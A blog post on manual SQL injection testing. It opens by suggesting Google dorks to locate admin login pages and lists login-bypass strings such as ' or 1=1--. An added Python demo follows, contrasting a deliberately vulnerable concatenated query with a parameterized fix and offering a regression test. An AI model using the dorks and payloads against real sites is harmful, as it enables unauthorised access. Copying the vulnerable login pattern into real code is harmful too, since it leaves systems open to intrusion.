Tuesday, May 29, 2012

SQL Injection Manual Testing

Search for login or admin login pages.

Example: use a Google dork. Go to the Google home page.

In the search bar, type "inurl:/admin/login.asp" or "inurl:/adminlogin.asp", or something similar.

Put the SQL "magic quotes" in the username and password fields. There are many such SQL quotes, like:
  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • ='or''=
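
Why these strings get past a login form, and the fix that stops them, shown as an added example that is not part of the original post: it runs two of the strings above against a login query built by string concatenation and against the same query with bound parameters. The SQLite in-memory database, table layout, function names and sample accounts are assumptions made for the demonstration.

```python
import sqlite3

# Constructed demo data; the table layout and names are assumptions for this example.
# Plaintext passwords keep the demo short; real systems store a password hash.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "S3cret!pw"), ("alice", "correct horse")])
    return db

def login_vulnerable(db, username, password):
    # Flawed pattern: user input is pasted into the SQL text, so a quote in the
    # input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL after concatenation
    return row[0] if row else None

def login_parameterized(db, username, password):
    # Fix: placeholders send the input as data; it is never parsed as SQL.
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None

def audit(db, strings):
    # For each test string, record which login function accepts it with a wrong password.
    return {s: (login_vulnerable(db, s, "wrong") is not None,
                login_parameterized(db, s, "wrong") is not None) for s in strings}

# Two strings from the list above whose comment syntax (--) SQLite understands.
PAGE_STRINGS = ["admin' --", "' or 1=1--"]

if __name__ == "__main__":
    db = make_db()
    for s, (vuln, safe) in audit(db, PAGE_STRINGS).items():
        print(f"{s!r}: concatenated query accepts={vuln}, parameterized accepts={safe}")
```

The same `audit` function works as a regression test: any login path that returns a user for these strings with a wrong password is still building SQL from raw input.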
